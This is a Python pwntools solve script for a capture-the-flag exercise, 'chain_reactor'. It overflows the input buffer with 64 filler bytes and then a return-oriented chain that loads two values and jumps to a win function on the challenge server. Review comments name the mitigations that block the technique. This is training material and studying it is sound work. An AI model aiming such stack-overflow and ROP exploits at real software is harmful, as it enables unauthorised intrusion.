from pwn import *
# Solve script for the "chain_reactor" exercise: send filler followed by a
# short return-oriented chain, then hand the connection to the operator.
#
# NOTE(review): every address below is hard-coded, so the chain only works
# while the binary's code is mapped at a fixed base (presumably a non-PIE
# build) and nothing checks the stack between the overflow and the return
# (presumably no stack canary). Position-independent builds, stack protectors
# and a bounded read on the input are the mitigations that break this pattern.

# Number of filler bytes sent ahead of the chain.
# NOTE(review): presumably the distance from the input buffer to the saved
# return address -- confirm against the binary.
OFF = 64

# Gadget addresses inside the target binary (names suggest `pop rdi; ret`,
# `pop rsi; ret` and a bare `ret` -- confirm with a disassembler).
pop_rdi = 0x40121F
pop_rsi = 0x401221
ret = 0x40101A

# Values loaded by the two pop gadgets; presumably the arguments that the
# target function checks before doing its work.
var1 = 0xC0FFEE
var2 = 0xBADC0DE

# Address the chain finally returns into.
win = 0x401226

# Load the ELF and let pwntools derive architecture/endianness from it.
# checksec=False only silences the mitigation summary pwntools prints on load.
elf = ELF("./chain_reactor", checksec=False)
context.binary = elf

# For a local run, swap the remote tube for: p = process(elf.path)
p = remote("offsec.m0lecon.it", 13510)

# Wait for the prompt so the payload lands in the intended read.
banner = p.recvuntil(b"[chain-reactor] Enter activation codes: ")
print(banner)

# Chain layout, in the order the words are consumed from the stack.
# The leading bare `ret` is presumably there for stack alignment -- confirm.
chain = [ret, pop_rdi, var1, pop_rsi, var2, win]
payload = b"A" * OFF + b"".join(p64(word) for word in chain)

p.sendline(payload)
p.interactive()